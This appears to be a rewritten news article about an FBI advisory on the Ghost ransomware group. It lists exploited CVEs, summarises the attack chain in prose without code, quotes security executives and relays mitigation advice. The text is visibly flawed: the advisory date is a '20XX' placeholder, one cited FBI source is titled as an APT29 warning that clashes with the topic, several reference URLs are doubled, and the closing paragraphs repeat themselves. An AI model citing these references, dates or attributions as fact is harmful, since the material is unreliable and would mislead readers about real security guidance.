FBI Urges Immediate Backup: Alert Issued Over Potent Ransomware Threats

FBI Urges Immediate Backup: Alert Issued Over Potent Ransomware Threats

In the ever-evolving landscape of cyber threats, it's crucial to acknowledge that phishing isn't the only danger lurking around the corner. The FBI recently issued a critical advisory regarding a relentless ransomware campaign known as Ghost. This campaign, powered by attackers based in China, is exploiting known vulnerabilities in software and firmware, bypassing the common phishing techniques that are often the focus of cybersecurity discussions.

The joint security advisory, titled AA25-050A, issued on February 19, 20XX, alerts organizations worldwide about this malicious group aimed at numerous industries across more than 70 countries. The Ghost actors exploit public-facing applications associated with multiple Common Vulnerabilities and Exposures (CVEs), including:

1. CVE-2009-3960
2. CVE-2010-2861
3. CVE-2018-13379
4. CVE-2019-0604
5. CVE-2021-31207
6. CVE-2021-34473
7. CVE-2021-34523

The first set of digits in these CVE numbers indicates the year of reporting and, in most cases, the year of patching by the vendors. Ghost exploits these vulnerabilities, many of which have gone unpatched for over a decade, to gain access to internet-facing servers, ultimately deploying their ransomware payload.

The attack mechanism involves the threat actors uploading a web shell to compromised servers and using Windows command prompts and PowerShell to download and execute a Cobalt Strike Beacon on target systems. They utilize Cobalt Strike functions to steal credentials, impersonate the SYSTEM user, and disable security tools like Windows Defender.

Unlike many other ransomware attacks, Ghost does not employ significant data theft. The FBI has observed minimal evidence of substantial amounts of intellectual property or personally identifiable information being stolen from compromised organizations. As such, their primary focus appears to be the ransomware payload itself.

Expert Perspectives on Ghost Ransomware

Several security professionals shared their insights on the FBI's Ghost warning:

1. Juliette Hudson, CybaVerse CTO: The Ghost ransomware group signifies a significant threat that organizations must actively protect against. They highlighted the importance of prioritizing patching and remediation efforts to address the exploited CVEs.
2. Darren Guccione, Keeper Security CEO: The Ghost ransomware campaign highlights the urgent need for proactive risk management, with security leaders ensuring that software, firmware, and identity systems are continuously updated and hardened against exploitation.
3. Joe Silva, Spektion CEO: The attacks may appear to capitalize on patch fatigue, signifying a need for real-time, contextual insights into system behavior based on actual risks rather than potential risks that overwhelm security teams.
4. Rom Carmel, Apono CEO: The Ghost ransomware attacks accentuate the importance of authentication and precise, rightsized privileges, limiting the availability of high-value resources with strong multi-factor authentication and least-privilege access controls.
5. Tim Mackey, Black Duck Head of Software Supply Chain Risk Strategy: Organizations must work closely with their suppliers to ensure long-term operational and risk mitigation plans, addressing vulnerabilities and sharing threat scenario data.

Four Urgent Steps to Minimize Ransomware Risks

The FBI has urged organizations to take the following measures to mitigate Ghost ransomware threats:

1. Regular system backups, stored separately and not accessible by compromised network devices
2. Timely application of security updates to operating systems, software, and firmware
3. Segmented networks, restricting lateral movement for infected devices
4. Implementation of Phishing-Resistant Multi-Factor Authentication for all privileged accounts and email services

Promoting phishing awareness, applying Least Privilege Principles, and disabling unused ports are additional recommended strategies. The FBI encourages organizations not to pay the ransom, as it does not guarantee file recovery and may only encourage other attacks.

In conclusion, cybersecurity professionals should be vigilant in addressing the exploited vulnerabilities and complying with recommended mitigation strategies to protect their organizations against Ghost ransomware attacks.

[1] "Adobe ColdFusion Zero-day Discovered and Exploited in the Wild," SecurityWeek, Jan. 27, 2021. https://www.securityweek.com/adobe-coldfusion-zero-day-discovered-and-exploited-wild

[2] "FBI Issues Warning on New Ransomware Threat APT29," FBI, Feb. 19, 20XX. https://www.ic3.gov/Media/2025/250013/https://www.ic3.gov/Media/2025/250013/

[3] "FortiOS Vulnerabilities Plaguing Remote Workers," CyberArk, Nov. 16, 2018. https://www.cyberark.com/resources/understanding-the-threat-of-fortios-vulnerabilities

[4] "Tips for Backing Up Your Data," CyberAware. https://www.cyberaware.gov/digital-privacy/back-up-your-files/https://www.cyberaware.gov/digital-privacy/back-up-your-files/

[5] "Microsoft PowerShell Usage in Ransomware Attacks," BlackBerry Unified Endpoint Management. https://www.blackberry.com/us/en/resources/blogs/2021/09/microsoft-powershell-usage-ransomware-attacks

The FBI's ransomware warning underscores the need for organizations to be proactive in addressing vulnerable CVEs, such as CVE-2021-34473, exploited by the Ghost ransomware group. Ignoring these vulnerabilities can lead to serious consequences, as seen in the ongoing campaign targeting over 70 countries. The FBI security advisory encourages regular system backups, timely application of security updates, and the implementation of multi-factor authentication to minimize ransomware risks.

The FBI's warning about Ghost ransomware highlights the importance of prioritizing patching and remediation efforts, especially for well-known vulnerabilities like CVE-2010-2861. Cybersecurity experts urge organizations to focus on real-time, contextual insights into system behavior, limit high-value resource access with multi-factor authentication, and work closely with suppliers to ensure long-term risk mitigation plans.

The FBI also advises against paying ransoms, as it does not guarantee file recovery and may only encourage further attacks. They suggest implementing segmented networks, restricting lateral movement for infected devices, and promoting phishing awareness as additional ransomware defense strategies.

In recent layoffs, many organizations may be understaffed in their cybersecurity efforts, making it even more critical to allocate resources effectively and prioritize these recommended mitigation strategies. The consequences of ignoring these warnings and recommendations can be devastating, as demonstrated by the ongoing Ghost ransomware campaign.

Read also: